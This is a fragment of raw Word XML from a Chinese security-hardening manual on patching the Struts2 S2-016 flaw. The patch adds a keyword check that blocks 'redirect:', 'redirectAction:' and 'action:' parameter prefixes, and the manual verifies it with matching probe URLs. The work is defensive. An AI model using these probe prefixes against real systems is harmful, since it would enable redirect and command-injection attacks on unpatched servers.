          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xwork-core-2.1.6.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放入</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>war</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB-INF/lib</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下此目的就是为了避免</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件带红叉</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8CD7BD" w14:textId="3F364DDC" w:rsidR="001319F2" w:rsidRPr="00B90E5F" w:rsidRDefault="001319F2"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修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>org.apache.struts2.dispatcher.mapper.DefaultActionMapper.java</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时文件应该没有红叉</w:t>
      </w:r>
      <w:r w:rsidR="00564413" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有红叉主要是缺乏</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>servlet-api.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xwork-core-2.1.6.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buildpath</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中改动如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE37DCF" w14:textId="5B0ACD29" w:rsidR="001319F2" w:rsidRPr="00B90E5F" w:rsidRDefault="001319F2" w:rsidP="002E176A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>handleSpecialParameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidR="00F23C09" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidR="00F23C09" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="84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3F781E" w:rsidRPr="00B90E5F" w14:paraId="4AFD1DF7" w14:textId="77777777" w:rsidTr="00936DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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12C100"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ublic void handleSpecialParameters(HttpServletRequest request,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C8300B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ActionMapping mapping) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48BFD6B5"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handle special parameter prefixes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="029CB067"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Set uniqueParameters = new HashSet();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5028204E"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Map parameterMap = request.getParameterMap();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E6C35B8"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for (Iterator iterator = parameterMap.keySet().iterator(); iterator</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0855951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hasNext();) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56460EA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String key = (String) iterator.next();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58AD7223"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Strip off the image button location info, if found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11009584"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key.endsWith(".x") || key.endsWith(".y")) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E749289"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key = key.substring(0, key.length() - 2);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39268AB4"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16A3FBAD"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 jason.zhou 20130708 add start -- //</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BFADEF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key.contains("redirect:")) || (key.contains("redirectAction:")) || (key.contains("action:"))) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="524939CB"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return;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3B0F30"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1AC29A9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 jason.zhou 20130708 add end -- //</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36B1CA95"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Ensure a parameter doesn't get processed twice</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DB5784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uniqueParameters.contains(key)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15D497A3"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arameterAction parameterAction = (ParameterAction) prefixTrie</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17C9F925"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get(key);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A67CB5F"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parameterAction != null) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AF1C791"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arameterAction.execute(key, mapping);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6881C729"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">                    uniqueParameters.add(key);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55C266A8"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break;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DE9110D"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113FE748"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5B987A8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7DDE0F47" w14:textId="00069D5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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="408461EC" w14:textId="713C63AA" w:rsidR="003F781E" w:rsidRPr="00B90E5F" w:rsidRDefault="003F781E"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lastRenderedPageBreak/>
        <w:t>点中</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>org.apache.struts2.dispatcher.</w:t>
      </w:r>
      <w:r w:rsidR="00645747" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mapper.DefaultActionMapper.java</w:t>
      </w:r>
      <w:r w:rsidR="00645747" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>右键</w:t>
      </w:r>
      <w:r w:rsidR="00645747" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r w:rsidR="00645747" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(export)</w:t>
      </w:r>
      <w:r w:rsidR="00645747" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JAR file</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存盘为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD7C71" w14:textId="7CB3B5ED" w:rsidR="003F781E" w:rsidRPr="00B90E5F" w:rsidRDefault="003F781E"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用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winrar</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r w:rsidR="00645747" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.jar</w:t>
      </w:r>
      <w:r w:rsidR="00645747" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拷贝出</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>org/apache/struts2/dispatcher/mapper/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DefaultActionMapper</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r w:rsidR="00645747" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一共有</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个文件</w:t>
      </w:r>
      <w:r w:rsidR="00645747" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678BCF7E"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1.class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A409CF"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1.class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25193FC4"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2.class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AFF587"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3.class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6B2623"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4.class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A314B6"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class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155E57AC"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clas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5614E2" w14:textId="4CB79300" w:rsidR="003F781E" w:rsidRPr="00B90E5F" w:rsidRDefault="003F781E"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用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winrar</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struts2-core-2.1.8.1.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>org/apache/struts2/dispatcher/mapper/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
      <w:r w:rsidR="00645747" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009A45DD" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面拷贝出的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个文件拷贝入</w:t>
      </w:r>
      <w:r w:rsidR="009A45DD" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>覆盖原来的同名文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046C132C" w14:textId="27D79550" w:rsidR="003F781E" w:rsidRPr="00B90E5F" w:rsidRDefault="003F781E" w:rsidP="002E176A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struts2-core-2.1.8.1.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拷贝入你自己的项目</w:t>
      </w:r>
      <w:r w:rsidR="009A45DD" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>覆盖原来的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struts2-core-2.1.8.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8EFF4C" w14:textId="40FD75DF" w:rsidR="005C51DF" w:rsidRPr="00913486" w:rsidRDefault="003F781E" w:rsidP="002E176A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动项目</w:t>
      </w:r>
      <w:r w:rsidR="005916FA" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新</w:t>
      </w:r>
      <w:r w:rsidR="005916FA" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s2-016</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidR="005916FA" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果发现测试结果正常</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不响应</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.do?action:,.</w:t>
      </w:r>
      <w:r w:rsidR="005916FA" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>do?redrect:,.do?redirectAction)</w:t>
      </w:r>
      <w:r w:rsidR="005916FA" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则证明补丁已生效</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431B474F" w14:textId="0412D91E" w:rsidR="00913486" w:rsidRPr="00B90E5F" w:rsidRDefault="00913486" w:rsidP="00913486">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="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54454101" w14:textId="3217F42E" w:rsidR="003A7A26" w:rsidRPr="00F975B2" w:rsidRDefault="0049034F" w:rsidP="00F975B2">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc498434572"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通用型</w:t>
      </w:r>
      <w:r w:rsidR="005C51DF" w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
      <w:r w:rsidR="005C51DF" w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F9956A" w14:textId="6B69BB73" w:rsidR="00F975B2" w:rsidRPr="00A2702D" w:rsidRDefault="00F975B2" w:rsidP="00A2702D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>注意事项：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A2702D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考《通用系统测试指南》</w:t>
      </w:r>
